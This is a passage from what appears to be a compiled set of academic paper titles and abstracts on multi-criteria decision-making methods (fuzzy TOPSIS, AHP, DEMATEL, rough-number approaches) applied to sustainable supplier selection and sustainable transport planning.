selection.Calculating weights using FPP and ranking suppliers using FTOPSIS.Explaining the model using the real case study based on the developed criteria. This study is aimed at developing the most important and applicable criteria and their corresponding sub-criteria for sustainable supplier selection through a questionnaire-based survey. In addition, a hybrid model is proposed to identify the most sustainable supplier with respect to the determined attributes using an Iranian textile manufacturing company as case study. The first contribution of the research is developing a comprehensive list of sustainability criteria and sub-criteria and incorporating them into a questionnaire and distributing the questionnaire to academics and practitioners for establishing the importance and applicability of these criteria and sub-criteria. In order to demonstrate the robustness of the data obtained from the questionnaire, different established statistical tests (Cronbachs alpha and Mann-Withney U-Test) were applied. The results show that economic aspect is still the most essential aspect, followed by environmental aspect and finally social aspect. The second contribution is the development of a new hybrid model by integrating fuzzy preference programing, as one of the newest and most accurate fuzzy modification of Analytical Hierarchy Process, with Fuzzy Technique for Order of Preference by Similarity to Ideal Solution. Fuzzy Preference Programming overcomes the shortcomings of the previous methods for obtaining the weight and Fuzzy Technique for Order of Preference by Similarity to Ideal Solution prioritizes the suppliers and finds the best one under uncertainty. Generally, the developed list provides a basis that is helpful in improving suppliers performance in terms of sustainability which leads to improvement in sustainable supply chain management performance. In addition, the developed hybrid model can deal with inconsistency, uncertainty and calculation complexity. Generally, the framework (including the first and second objectives) can be applied by managers to evaluate and determine their appropriate suppliers in the presence of uncertainty. --- paper_title: Evaluating the performance of suppliers based on using the R'AMATEL-MAIRCA method for green supply chain implementation in electronics industry paper_content: Abstract Green supply chain management (GSCM) practitioners striving to create a healthier environment should first identify the key criteria pertinent to the process of implementing the appropriate sustainable policies, particularly in the most rapidly growing electronics sector. Since the decision to adopt GSCM in electronics industry is associated with the use of a multi-dimensional approach involving a number of qualitative criteria, the paper examines GSCM based on fifteen criteria expressed in five dimensions and proposes a multi-criteria evaluation framework for selecting suitable green suppliers. In real life, the assessment of this decision is based on vague information or imprecise data of the expert's subjective judgements, including the feedback from the criteria and their interdependence. Thus to treat this uncertainty in multi-criteria decision making (MCDM) process, rough number (RN) is applied here using only the internal knowledge in the operative data available to the decision-makers. In this way objective imprecisions and uncertainties are used and there is no need to rely on models of assumptions. Instead of different external parameters in the application of RN, the structure of the given data is used. Therefore, the identified components are incorporated into a rough DEMATEL-ANP (R'AMATEL) method, combining the Decision Making Trial and Evaluation Laboratory Model (DEMATEL) and the Analytical Network Process (ANP) in a rough context. In group decision making, a rough number-based approach aggregates individual judgements and handles imprecision. The structure of the relationships between the criteria expressed in different dimensions is determined by using the rough DEMATEL (R'DAMETEL) method and building an influential network relation mapping, based on which the rough ANP (R'ANP) method is implemented to obtain the respective criteria weights. Then, the rough multi-attribute Ideal-Real Comparative Analysis (R'MAIRCA) is used to evaluate the environmental performance of suppliers for each evaluation criterion. Sensitivity analysis is performed to determine the impact of the weights of criteria and the influence of the decision maker's preferences on the final evaluation results. Applying the Spearman's rank correlation coefficient and other ranking methods, the stability of the alternative rankings based on the variation in the criteria weights is checked. The results obtained in the study show that the proposed method significantly increases the objectivity of supplier assessment in a subjective environment. --- paper_title: Framework for selecting sustainable supply chain processes and industries using an integrated approach paper_content: Abstract This study introduces a process view of sustainable supply chain management and identifies 17 sustainable supply chain processes (SSCPs) from literature. Further, a framework is proposed to identify the significance of various SSCPs on firm performance using the theoretical lenses of stakeholder theory and resource based view. Through a semi-structured interview of stakeholders, critical SSCPs across eight industries were identified in the Indian context. The study identifies five important SSCPs, such as sustainable design and development, strategic sourcing and efficient technology and sustainable product returns and recycling. Among the selected industries, pharmaceutical, agricultural and chemical industries were identified to be the front-runners in SSCPs practice. Subsequently, these five processes and three industries were evaluated using strategic decision making approach by integrating group decision making and fuzzy multi-criteria decision making methods. To handle the uncertainties of strategic decision making, six Fuzzy Multi-Criteria Decision Making methods have been applied and compared to understand their relevance while evaluating the above industries, based on the above identified SSCPs. This study introduces an approach to enhance sustainability of supply chain that can be extended across industries through a process view of supply chain, in emerging economies like India. --- paper_title: A Novel Rough WASPAS Approach for Supplier Selection in a Company Manufacturing PVC Carpentry Products paper_content: The decision-making process requires the prior definition and fulfillment of certain factors, especially when it comes to complex areas such as supply chain management. One of the most important items in the initial phase of the supply chain, which strongly influences its further flow, is to decide on the most favorable supplier. In this paper a selection of suppliers in a company producing polyvinyl chloride (PVC) carpentry was made based on the new approach developed in the field of multi-criteria decision making (MCDM). The relative values of the weight coefficients of the criteria are calculated using the rough analytical hierarchical process (AHP) method. The evaluation and ranking of suppliers is carried out using the new rough weighted aggregated sum product assessment (WASPAS) method. In order to determine the stability of the model and the ability to apply the developed rough WASPAS approach, the paper analyzes its sensitivity, which involves changing the value of the coefficient λ in the first part. The second part of the sensitivity analysis relates to the application of different multi-criteria decision-making methods in combination with rough numbers that have been developed in the very recent past. The model presented in the paper is solved by using the following methods: rough Simple Additive Weighting (SAW), rough Evaluation based on Distancefrom Average Solution (EDAS), rough MultiAttributive Border Approximation area Comparison (MABAC), rough Visekriterijumsko kompromisno rangiranje (VIKOR), rough MultiAttributiveIdeal-Real Comparative Analysis (MAIRCA) and rough Multi-objective optimization by ratio analysis plus the full multiplicative form (MULTIMOORA). In addition, in the third part of the sensitivity analysis, the Spearman correlation coefficient (SCC) of the ranks obtained was calculated which confirms the applicability of all the proposed approaches. The proposed rough model allows the evaluation of alternatives despite the imprecision and lack of quantitative information in the information-management process. --- paper_title: Multi-Criteria Indicator for Sustainability Rating in Suppliers of the Oil and Gas Industries in Brazil paper_content: The necessity of sustainability evaluation is rapidly growing alongside the expansion of civilization. Likewise, the supply chain suitability improvement is a need that has arisen in the petroleum industry, especially as it is responsible for the most part of CO 2 emissions in the atmosphere. The modeling of this kind of problem deals with multiple criteria evaluations. This paper proposes an original multiple-criteria based approach to classifying the degree of organizational sustainability. This proposal was applied to evaluate a representative set of companies, which are suppliers of the Brazilian petroleum industry. The data collection was supported by a questionnaire. The results highlight that the studied companies have not yet reached an advanced level of maturity in the sustainability context. In a comprehensive vision of sustainability based on Triple Bottom Line (TBL), these companies are either in the initial stage or in the implementation phase of the sustainability practices. --- paper_title: Selecting Green Supplier of Thermal Power Equipment by Using a Hybrid MCDM Method for Sustainability paper_content: With the growing worldwide awareness of environmental protection and sustainable development, green purchasing has become an important issue for companies to gain environmental and developmental sustainability. Thermal power is the main power generation form in China, and the green supplier selection is essential to the smooth and sustainable construction of thermal power plants. Therefore, selecting the proper green supplier of thermal power equipment is very important to the company’s sustainable development and the sustainability of China’s electric power industry. In this paper, a hybrid fuzzy multi-attribute decision making approach (fuzzy entropy-TOPSIS) is proposed for selecting the best green supplier. The fuzzy set theory is applied to translate the linguistic preferences into triangular fuzzy numbers. The subjective criteria weights are determined by using decision makers’ superiority linguistic ratings and the objective ones are determined by combining the superiority linguistic ratings and fuzzy-entropy weighting method. The fuzzy TOPSIS is employed to generate an overall performance score for each green supplier. An empirical green supplier selection is conducted to illustrate the effectiveness of this proposed fuzzy entropy-TOPSIS approach. This proposed fuzzy entropy-TOPSIS approach can select the proper green supplier of thermal power equipment, which contributes to promoting the company’s sustainable development and the sustainability of China’s electric power industry to some extent. --- paper_title: A case analysis of a sustainable food supply chain distribution system—A multi-objective approach paper_content: Sustainable supply chain management is a topical area which is continuing to grow and evolve. Within supply chains, downstream distribution from producers to customers plays a significant role in the environmental performance of production supply chains. With consumer consciousness growing in the area of sustainable food supply, food distribution needs to embrace and adapt to improve its environmental performance, while still remaining economically competitive. With a particular focus on the dairy industry, a robust solution approach is presented for the design of a capacitated distribution network for a two-layer supply chain involved in the distribution of milk in Ireland. In particular the green multi-objective optimisation model minimises CO2 emissions from transportation and total costs in the distribution chain. These distribution channels are analysed to ensure the non-dominated solutions are distributed along the Pareto fronts. A multi-attribute decision-making approach, TOPSIS, has been used to rank the realistic feasible transportation routes resulting from the trade-offs between total costs and CO2 emissions. The refined realistic solution space allows the decision-makers to geographically locate the sustainable transportation routes. In addition to geographical mapping the decision maker is also presented with a number of alternative analysed scenarios which forcibly open closed distribution routes to build resiliency into the solution approach. In terms of model performance, three separate GA based optimisers have been evaluated and reported upon. In the case presented NSGA-II was found to outperform its counterparts of MOGA-II and HYBRID. --- paper_title: Improving sustainable supply chain management using a novel hierarchical grey-DEMATEL approach paper_content: Abstract Sustainable supply chain management has been studied in the past. However, the previous studies lack proper justification for a multi-criteria decision-making structure of the hierarchical interrelationships in incomplete information. To fill this gap, this study proposes a hierarchical grey decision-making trial and evaluation laboratory method to identify and analyze criteria and alternatives in incomplete information. Traditionally, the decision-making trial and evaluation laboratory method does not address a hierarchical structure and involves incomplete information within its analytical method. However, the grey theory compensates for incomplete information. This study's purpose is to apply the proposed hierarchical structure to identify aspects of and criteria for supplier prioritization. This includes an original set of criteria for structuring the following: aspects as a sustainable plan, communities for sustainability, sustainable operational process control and sustainable certification and growth. The results present the recycle/reuse/reduce option as a tool to increase the material savings percentage, which is the top criterion for supplier selection. This study concluded that the hierarchical analytical method provides a strong basis for future academic and practitioner research. --- paper_title: A multi-objective model for multi-product multi-site aggregate production planning in a green supply chain: Considering collection and recycling centers paper_content: Abstract The present study was designed to incorporate the profit and green principles in an aggregate production planning. It is difficult to ignore the key role of green principles in balancing environmental and economic performance for companies facing community, and competitive pressures. In this paper, a multi-objective multi-period multi-product multi-site aggregate production planning (APP) model is presented in a green supply chain considering a reverse logistic (RL) network. In the proposed model, products are scored in terms of environmental criteria such as recyclability, biodegradability, energy consumption and product risk, using analytical hierarchy process (AHP). Speaking in simple terms, the AHP concept is utilized to get one single indicator that describes environmental impact of various production alternatives. Some other green indicators including waste management, greenhouse gas (GHG) emissions arising from production methods and transportation are embedded in the model. The limited number of potential collection and recycling centers can be opened in order to produce the second-class goods. The LP-metrics method is used to consider two conflicting objectives, i.e. minimizing total losses and maximizing total environmental scores of products, simultaneously. Further, the trade-off between objectives is demonstrated by a collection of Pareto-optimal solutions. The model shows how profit and green principles can be incorporated in an APP problem. Finally, the model validity is demonstrated by a numerical example. The sensitivity analysis is carried out for GHG emission level arising from production and transportation and industrial waste level to provide some useful managerial insights, then analysis of the cost and profit in collection and recycling system, is conducted to show its performance. --- paper_title: Evaluating the Drivers to Information and Communication Technology for Effective Sustainability Initiatives in Supply Chains paper_content: Supply chain (SC) sustainability has become a global issue. To develop sustainability focused SC networks, the role of Information and Communication Technologies (ICTs) is of great significance. An effective information system and management can help not only in improving better customer service and in cost control, but also can assist planning to achieve the three pillars of sustainability (ecological, economic, and societal development), thereby enhancing business efficiency. This paper aims to identify and evaluate the drivers relevant to ICT for sustainability initiatives in SCs. The drivers are finalized through a literature survey and use of the Delphi technique. The finalized drivers are analyzed by a procedure using the fuzzy DEMATEL approach. The research findings suggest that “Government support systems and subsidies”, “Knowledge and awareness of ICT tools and techniques,” and “Information systems network design” drivers have the most significant influences in the implementation of ICT for incorporating sustainability in SCs. This work may help practitioners and researchers in strategic decision-making and in formulating effective plans for the implementation of ICT and for incorporating sustainable concepts in SCs. --- paper_title: A review of modeling approaches for sustainable supply chain management paper_content: More than 300 papers have been published in the last 15years on the topic of green or sustainable (forward) supply chains. Looking at the research methodologies employed, only 36 papers apply quantitative models. This is in contrast to, for example, the neighboring field of reverse or closed-loop supply chains where several reviews on respective quantitative models have already been provided. The paper summarizes research on quantitative models for forward supply chains and thereby contributes to the further substantiation of the field. While different kinds of models are applied, it is evident that the social side of sustainability is not taken into account. On the environmental side, life-cycle assessment based approaches and impact criteria clearly dominate. On the modeling side there are three dominant approaches: equilibrium models, multi-criteria decision making and analytical hierarchy process. There has been only limited empirical research so far. The paper ends with suggestions for future research. --- paper_title: A new fuzzy multi-criteria framework for measuring sustainability performance of a supply chain paper_content: Sustainable supply chain performance measurement is aimed at addressing environmental, social and economic aspects of sustainable supply chain management. It can be argued that it is not easy to reduce all dimensions of sustainable supply chain to a single unit. Then, the issue is that all valuations should somehow be reducible to a single one-dimensional standard. Multi-criteria evaluation introduces a framework to remedy this issue. As a consequence, multi-criteria evaluation seems to supply a proper and adequate assessment framework for sustainable supply chain assessment. In this study, a multi-criteria framework based on fuzzy entropy and fuzzy multi-attribute utility (FMAUT) is proposed in order to evaluate and compare the company performances in terms of sustainable supply chain. However, note that reducing all aspects of sustainable supply chain to a single unit using a multi-criteria framework may not be sufficient to satisfy all the needs of decision makers although it is used to evaluate sustainability performance of supply chains with respect to three aspects. Therefore, in this research, an alert management system is also developed to satisfy further requirements of users. The proposed frameworks are tested using data obtained from one of the middle sized Turkish grocery retailers. --- paper_title: A supplier selection life cycle approach integrating traditional and environmental criteria using the best worst method paper_content: Abstract Supplier selection is a strategic decision that significantly influences a firm's competitive advantage. The importance of this decision is amplified when a firm seeks new markets and potentially a new supplier base. Recognizing the importance of these decisions, an innovative three-phase supplier selection methodology including pre-selection, selection, and aggregation is proposed. Conjunctive screening is used for pre-selection, the best worst method (BWM), a novel multiple criteria decision-making method is introduced for the selection phase. Material price and annual quantity are integrated with the decision at the aggregation phase. Qualitative, quantitative, traditional business, and environmental criteria are incorporated. The proposed methodology is applied within a food supply chain context, the edible oils industry. In this illustration the focal organization faces a global entry decision in a new international market. An extensive search is completed to identify the potential suppliers. Through initial screening a sub-set of qualified suppliers is identified. BWM is then used to find the best suppliers from among the qualified suppliers. Eventually the significance of the supplies in the aggregation phase is determined. The outcome is a relatively meaningful ranking of suppliers. The paper provides insights into the methodology, decision, and managerial implications. Study and model limitations, along with future research directions are described. --- paper_title: Novel Integrated Multi-Criteria Model for Supplier Selection: Case Study Construction Company paper_content: Supply chain presents a very complex field involving a large number of participants. The aim of the complete supply chain is finding an optimum from the aspect of all participants, which is a rather complex task. In order to ensure optimum satisfaction for all participants, it is necessary that the beginning phase consists of correct evaluations and supplier selection. In this study, the supplier selection was performed in the construction company, on the basis of a new approach in the field of multi-criteria model. Weight coefficients were obtained by DEMATEL (Decision Making Trial and Evaluation Laboratory) method, based on the rough numbers. Evaluation and the supplier selection were made on the basis of a new Rough EDAS (Evaluation based on Distance from Average Solution) method, which presents one of the latest methods in this field. In order to determine the stability of the model and the applicability of the proposed Rough EDAS method, an extension of the COPRAS and MULTIMOORA method by rough numbers was also performed in this study, and the findings of the comparative analysis were presented. Besides the new approaches based on the extension by rough numbers, the results are also compared with the Rough MABAC (MultiAttributive Border Approximation area Comparison) and Rough MAIRCA (MultiAttributive Ideal-Real Comparative Analysis). In addition, in the sensitivity analysis, 18 different scenarios were formed, the ones in which criteria change their original values. At the end of the sensitivity analysis, SCC (Spearman Correlation Coefficient) of the obtained ranges was carried out, confirming the applicability of the proposed approaches. --- paper_title: Low Carbon Supplier Selection in the Hotel Industry paper_content: This study presents a model for evaluating the carbon and energy management performance of suppliers by using multiple-criteria decision-making (MCDM). By conducting a literature review and gathering expert opinions, 10 criteria on carbon and energy performance were identified to evaluate low carbon suppliers using the Fuzzy Delphi Method (FDM). Subsequently, the decision-making trial and evaluation laboratory (DEMATEL) method was used to determine the importance of evaluation criteria in selecting suppliers and the causal relationships between them. The DEMATEL-based analytic network process (DANP) and VlseKriterijumska Optimizacija I Kompromisno Resenje (VIKOR) were adopted to evaluate the weights and performances of suppliers and to obtain a solution under each evaluation criterion. An illustrative example of a hotel company was presented to demonstrate how to select a low carbon supplier according to carbon and energy management. The proposed hybrid model can help firms become effective in facilitating low carbon supply chains in hotels. --- paper_title: An integrated framework for sustainable supplier selection and evaluation in supply chains paper_content: Due to increased customer knowledge and ecological pressures from markets and various stakeholders, business organizations have emphasized the importance of greening and sustainability in their supply chain through supplier selection. Therefore, a systematic and sustainability-focused evaluation system for supplier selection is needed from an organizational supply chain perspective. This work proposes a framework to evaluate sustainable supplier selection by using an integrated Analytical Hierarchy Process (AHP), ViseKriterijumska Optimizacija I Kompromisno Resenje (VIKOR), a multi-criteria optimization and compromise solution approach. Initially, 22 sustainable supplier selection criteria and three dimensions of criteria (economic, environmental, and social) have been identified through literature and experts' opinions. A real world example of an automobile company in India is discussed to demonstrate the proposed framework applicability. According to the findings, ‘Environmental costs,’ ‘Quality of product,’ ‘Price of product,’ ‘Occupational health and safety systems,’ and ‘Environmental competencies’ have been ranked as the top five sustainable supplier selection criteria. In addition, out of the five sustainable supplier's alternatives, supplier number ‘three’ got the highest rank. The work presented in this paper may help managers and business professionals not only to distinguish the important supplier selection criteria but also to evaluate the most efficient supplier for sustainability in supply chain, while remaining competitive in the market. Sensitivity analysis is also conducted to test the proposed framework robustness. --- paper_title: Operations and inspection Cost minimization for a reverse supply chain paper_content: Reverse supply chain is a process dealing with the backward flows of used/damaged products or materials. Reverse supply chain includes activities such as collection, inspection, reprocess, disposal and redistribution. A well-organized reverse supply chain can provide important advantages such as economic and environmental ones. In this study, we propose a configuration in which quality assurance is a substantial operation to be fulfilled in the reverse chain so that to minimize the total costs of the reverse supply chain. A mathematical model is formulated for product return in reverse supply chain considering quality assurance. We consider a multilayer, multi-product for the model. Control charts with exponentially weighted moving average (EWMA) statistics (mean and variance) are used to jointly monitor the mean and variance of a process. An EWMA cost minimization model is presented to design the joint control scheme based on performance criteria. The main objective of the paper is minimizing the total costs of reverse supply chain with respect to inspection. --- paper_title: Sustainable supplier selection and order lot-sizing: An integrated multi-objective decision-making process paper_content: Within supply chains activities, selecting appropriate suppliers based on the sustainability criteria (economic, environmental and social) can help companies move toward sustainable development. Although several studies have recently been accomplished to incorporate sustainability criteria into supplier selection problem, much less attention has been devoted to developing a comprehensive mathematical model that allocates the optimal quantities of orders to suppliers considering lot-sizing problems. In this research, we propose an integrated approach of rule-based weighted fuzzy method, fuzzy analytical hierarchy process and multi-objective mathematical programming for sustainable supplier selection and order allocation combined with multi-period multi-product lot-sizing problem. The mathematical programming model consists of four objective functions which are minimising total cost, maximising total social score, maximising total environmental score and maximising total economic qualitative score. The prop... --- paper_title: A four-phase AHP–QFD approach for supplier assessment: a sustainability perspective paper_content: Recently, companies have become increasingly aware of the need to evaluate suppliers from a sustainability perspective. Introducing the triple bottom line (economic, social, and environmental performance) into supplier assessment and selection decisions embeds a new set of trade-offs, complicating the decision-making process. Although many tools have been developed to help purchasing managers make more effective decisions, decision support tools, and methodologies which integrate sustainability (triple bottom line) into supplier assessment and selection are still sparse in the literature. Moreover, most approaches have not taken into consideration the impact of business objectives and requirements of company stakeholders on the supplier evaluation criteria. To help advance this area of research and further integrate sustainability into the supplier selection modelling area, we develop an integrated analytical approach, combining Analytical Hierarchy Process (AHP) with Quality Function Deployment (QFD), to... --- paper_title: Sustainable third-party reverse logistic provider selection with fuzzy SWARA and fuzzy MOORA in plastic industry paper_content: Third-party logistic provider (3PLP) companies play a major role in supply chain management (SCM) by carrying out specialized functions—namely, integrated operation, warehousing, and transportation services. Taking sustainability issues into consideration makes reverse logistics even more significant. In this paper, a combination of sustainability and risk factors was considered for third-party reverse logistic provider (3PRLP) evaluation. Initially, fuzzy step-wise weight assessment ratio analysis (Fuzzy SWARA) was applied for weighing the evaluation criteria; then, Fuzzy multi-objective optimization on the basis of ratio analysis (Fuzzy MOORA) was utilized for ranking the sustainable third-party reverse logistic providers in the plastic industry in the second step. Findings highlight that quality, recycling, health, and safety were the most important criteria in economic, environmental, and social dimensions of sustainability, respectively. Also, operational risk was found to have the highest weight among risk factors. --- paper_title: Using AHP and Dempster-Shafer theory for evaluating sustainable transport solutions paper_content: In this paper, we present a hybrid approach based on the Analytical Hierarchy Process (AHP) and Dempster-Shafer theory for evaluating the impact of environment-friendly transport measures like mode sharing, multi-modal transport solutions, intelligent transport solutions, etc. on city sustainability. The proposed approach is a mix of curiosity driven and client-driven research in the sense that the problem is guided by the client for practical applicability and the solution is motivated by technical or scientific contribution to research. The solution approach comprises multiple steps. In the first step, we identify the criteria for sustainability evaluation. AHP is used to structure and rate the criteria. In the second step, we test the transportation measure for sustainability and collect data from multiple information sources like human experts, questionnaire, sensors, models, etc on the selected criteria for evaluation purposes. The information from multiple data sources is combined using Dempster-Shafer theory. In the third step, we estimate the state of sustainability of the city using a Transport Sustainability Index (TSI). The Transport Sustainability Index is computed at two stages: pre- and post-test stages of the transportation measure. In the fourth step, we assess the impacts of the transportation measure on the city sustainability by observing the difference between the values at the pre- and the post-test stages. If an increase in the value of TSI is observed, then the impact of the transportation measure on city sustainability is judged as positive and it is recommended for adoption. We illustrate our approach by application on the transportation measure ''Carsharing''. --- paper_title: A hybrid approach integrating Affinity Diagram, AHP and fuzzy TOPSIS for sustainable city logistics planning paper_content: Abstract City logistics initiatives are steps taken by municipal administrations to ameliorate the condition of goods transport in cities and reduce their negative impacts on city residents and their environment. Examples of city logistics initiatives are urban distribution centers, congestion pricing, delivery timing and access restrictions. In this paper, we present a hybrid approach based on Affinity Diagram, AHP and fuzzy TOPSIS for evaluating city logistics initiatives. Four initiatives namely vehicle sizing restrictions, congestion charging schemes, urban distribution center and access timing restrictions are considered. The proposed approach consists of four steps. The first step involves identification of criteria for assessing performance of city logistics initiatives using Affinity Diagram. The results are four categories of criteria namely technical, social, economical and environmental. In step 2, a decision making committee comprising of representatives of city logistics stakeholders is formed. These stakeholders are shippers, receivers, transport operators, end consumers and public administrators. The committee members weight the selected criteria using AHP. In step 3, the decision makers provide linguistic ratings to the alternatives (city logistics initiatives) to assess their performance against the selected criteria. These linguistic ratings are then aggregated using fuzzy TOPSIS to generate an overall performance score for each alternative. The alternative with the highest score is finally chosen as most suitable city logistics initiative for improving city sustainability. In the fourth step, we perform sensitivity analysis to evaluate the influence of criteria weights on the selection of the best alternative. The proposed approach is novel and can be practically applied for selecting sustainable city logistics initiatives for cities. Another advantage is its ability to generate solutions under limited quantitative information. An empirical application of the proposed approach is provided. --- paper_title: Multiple criteria decision-making techniques in transportation systems: a systematic review of the state of the art literature paper_content: AbstractThe main goal of this review paper is to provide a systematic review of Multiple Criteria Decision-Making (MCDM) techniques in regard to transportation systems problems. This study reviewed a total of 89 papers, published from 1993 to 2015, from 39 high-ranking journals; most of which were related to transportation science and were extracted from the Web of Science and Scopus databases. Papers were classified into 10 main application areas and nine transport infrastructure. Furthermore, papers were categorized based on the author(s) and year, name of the journal in which they were published, technique and approach, author(s) nationality, application area and scope, study purpose, gap and research problem and results and outcome. The results of this study indicated that more papers on MCDM in 2013 than in any other year. AHP and Fuzzy-AHP methods in the individual methods and hybrid MCDM and fuzzy MCDM in the integrated methods were ranked as the first and second methods in use, respectively. The T... --- paper_title: One solution for cross-country transport-sustainability evaluation using a modified ELECTRE method paper_content: Transport is an economic activity having complex interactions with the environment, and since the concept of sustainable development was identified as a global priority, there has been a growing interest in assessing the performance of transport systems with respect to sustainability issues. Although the Ecological Economics literature deals extensively with the strategy of sustainable development, far less attention has been paid to its application in the transport sector as of yet. The main purpose of this study was to introduce the noncompensatory analytical tool, which integrates multidimensional conditions present in the sustainability concept. The focus was on the potential of the outranking approach, namely the ELECTRE (ELimination Et Choix Traduisant la REalite; Elimination And Choice Corresponding to Reality) method for the evaluation of transport sustainability at the macro level, using the indicator set as a starting point. The method has been applied to selected European countries within a case study. As a result, according to transport-sustainability issues, pairwise relations between countries have been established. Based on these relations, and according to the chosen criteria, a set of countries with a better level of performance was selected as the core subset of the relation graph. To control and avoid the appearance of indifference relations between countries, as well as to reduce the subjectivity of decision makers, we propose a modification of ELECTRE I. Finally, we apply both the original and the modified methods, together with the sensitivity analysis. The results are presented in a convenient graph form and then compared. --- paper_title: Intermodal Transport Terminal Location Selection Using a Novel Hybrid MCDM Model paper_content: Intermodal Transport (IT) allows savings in energy, time and costs, improves the quality of services and supports sustainable development of the transport system. In order to make IT more competitive it is necessary to support the development of intermodal transport terminal (ITT), whereby it is very important to make adequate decision on its location. This paper proposes a framework for the selection of the ITT location which would be most appropriate for the various stakeholders (investors, users, administration and residents). They often have conflicting goals and interests, so it is necessary to define a large number of criteria for the evaluation. A novel hybrid MCDM model that combines fuzzy Delphi, fuzzy Delphi based fuzzy ANP (fuzzy DANP) and fuzzy Delphi based fuzzy Visekriterijumska Optimizacija i kompromisno Resenje (fuzzy DVIKOR) methods is developed in this paper with the aim of providing support to decision makers. The model is developed in the fuzzy environment in order to overcome the ambiguity and uncertainty of the decision makers’ evaluations of the criteria, sub-criteria and alternatives. The validity and applicability of the model is demonstrated by successfully resolving the problem of selecting the location of the ITT in the City of Belgrade. --- paper_title: Evaluating Plan Alternatives for Transportation System Sustainability: Atlanta Metropolitan Region paper_content: A growing number of agencies have begun to define ‘‘sustainability’’ for transportation systems and are attempting to incorporate the concept into the regional transportation planning process. Still, very few metropolitan planning organizations (MPOs) capture the comprehensive impact of transportation system and land use changes on the economy, environment, and social quality of life, which are commonly considered the essential three dimensions of sustainable transportation systems. This paper demonstrates an application of the Multiple Criteria Decision Making (MCDM) approach for evaluating selected transportation and land use plans in the Atlanta region using multiple sustainability parameters. A composite sustainability index is introduced as a decision support tool for transportation policymaking, where the sustainability index considers multidimensional conflicting criteria in the transportation planning process. The proposed framework should help decision-makers with incorporating sustainability considerations into transportation planning as well as identifying the most sustainable (or least unsustainable) plan for predetermined objectives. --- paper_title: Strategic Transport Management Models—The Case Study of an Oil Industry paper_content: The awareness of the need to preserve the environment and establish sustainable development evolved as the result of the development of the world economy and society. Transport plays a very important role in this process. It is recognized as one of the main factors in sustainable development strategy. Strategic transport management model is presented in this paper. It represents a comprehensive and complete strategic management process, beginning from the strategic analysis, then strategy formulation and its implementation to strategic control. What makes this model specific is the development of its phases using contemporary strategic management methods and MCDM (Multicriteria Decision Making) techniques. In this way, subjectivity is avoided and the decision-making process is impartial. To formulate sustainable transport strategy, the authors use a SWOT analysis (Strengths, Weaknesses, Opportunities, and Threats) and the fuzzy Delphi method as the basis to evaluate impact factors. Fuzzy SWOT analysis is applied to formulate strategic options and the selection of optimal option is realized through DEMATEL (Decision-Making Trial and Evaluation Laboratory)-based ANP (Analytic Network Process). The strategic transport management model is applied to Serbian Oil Industry (NIS) as a company engaged in the production and transport of oil and oil derivatives. The results presented in this paper have shown that this model can be successfully implemented in profit organizations. It also can be used to formulate strategies on the basis of scientific principles and create conditions for successful sustainable strategies implementation. --- paper_title: Development of a multi-criteria assessment model for ranking of renewable and non-renewable transportation fuel vehicles paper_content: Several factors, including economical, environmental, and social factors, are involved in selection of the best fuel-based vehicles for road transportation. This leads to a multi-criteria selection problem for multi-alternatives. In this study, a multi-criteria assessment model was developed to rank different road transportation fuel-based vehicles (both renewable and non-renewable) using a method called Preference Ranking Organization Method for Enrichment and Evaluations (PROMETHEE). This method combines qualitative and quantitative criteria to rank various alternatives. In this study, vehicles based on gasoline, gasoline–electric (hybrid), E85 ethanol, diesel, B100 biodiesel, and compressed natural gas (CNG) were considered as alternatives. These alternatives were ranked based on five criteria: vehicle cost, fuel cost, distance between refueling stations, number of vehicle options available to the consumer, and greenhouse gas (GHG) emissions per unit distance traveled. In addition, sensitivity analyses were performed to study the impact of changes in various parameters on final ranking. Two base cases and several alternative scenarios were evaluated. In the base case scenario with higher weight on economical parameters, gasoline-based vehicle was ranked higher than other vehicles. In the base case scenario with higher weight on environmental parameters, hybrid vehicle was ranked first followed by biodiesel-based vehicle. --- paper_title: Integration of Sustainability Issues in Strategic Transportation Planning: A Multi-criteria Model for the Assessment of Transport Infrastructure Plans paper_content: Past decades have witnessed significant advances in transportation planning methodologies, facilitated by the development of computational algorithms, technologies, and spatial modeling tools such as geographical information systems (GIS) and decision support systems (DSS). However, at strategic planning levels, a commonly accepted assessment model integrating the sustainability paradigm is still lacking. This work presents a novel contribution to this research line, with the proposal of a multi-criteria assessment model embedded in a GIS. The criteria have been designed covering the 3 dimensions of sustainability: economic, social, and environmental. This assessment model constitutes an interdisciplinary approach tightly linking network analysis, spatial geography, regional economic, and environmental issues in a GIS-based computer framework. The validity of the methodology is tested with its application in a case study: the extension of the high speed rail network included in the Spanish Transport and Infrastructure Plan 2005-2020. --- paper_title: Location selection of city logistics centers under sustainability paper_content: City Logistics Centers (CLC) are an important part of the modern urban logistics system, and the selection of the location of a CLC has become a key problem in logistics and supply chain management. Integrating the economic, environmental, and social dimensions of sustainable development, this paper presents a new evaluation system for the location selection of a CLC from a sustainability perspective. A fuzzy multi-attribute group decision making (FMAGDM) technique based on a linguistic 2-tuple is used to evaluate potential alternative CLC locations. In this method, the linguistic evaluation values of all the evaluation criteria are transformed into linguistic 2-tuples. A new 2-tuple hybrid ordered weighted averaging (THOWA) operator is presented to aggregate the overall evaluation values of all experts into a collective evaluation value for each alternative, which is then used to rank and select alternative CLC locations. An application example is provided to validate the method developed and to highlight the implementation, practicality, and effectiveness by comparing with the fuzzy Technique for Order of Preference by Similarity to Ideal Solution (TOPSIS) method. --- paper_title: Application of fuzzy TOPSIS in evaluating sustainable transportation systems paper_content: Sustainable transportation systems are the need of modern times. There has been an unexpected growth in the number of transportation activities over years and the trend is expected to continue in the coming years. This has obviously associated environmental costs like air pollution, noise, etc. which is degrading the quality of life in modern cities. To cope us this crisis, municipal administrations are investing in sustainable transportation systems that are not only efficient, robust and economical but also friendly towards environment. The challenge before the transportation decision makers is how to evaluate and select such sustainable transportation systems. In this paper, we present a multicriteria decision making approach for selecting sustainability transportation systems under partial or incomplete information (uncertainty). The proposed approach comprises of three steps. In step 1, we identify the criteria for sustainability assessment of transportation. In step 2, experts provide linguistic ratings to the potential alternatives against the selected criteria. Fuzzy TOPSIS is used to generate aggregate scores for sustainability assessment and selection of best alternative. In step 3, sensitivity analysis is performed to determine the influence of criteria weights on the decision making process. A numerical illustration is provided to demonstrate the applicability of the approach. The strength of the proposed work is its practical applicability and the ability to generate good quality solutions under uncertainty. --- paper_title: Proposed framework for sustainability screening of urban transport projects in developing countries: A case study of Accra, Ghana paper_content: This paper documents a framework suggested for screening urban transport projects in developing countries to reflect local issues relevant to sustainability. The framework is based on the integration of indigenous and scientific knowledge to reflect the sustainability of candidate projects. This is achieved through a participatory approach to integrate inputs from system users and providers to produce a term defined as the Localized Sustainability Score (LSS). The 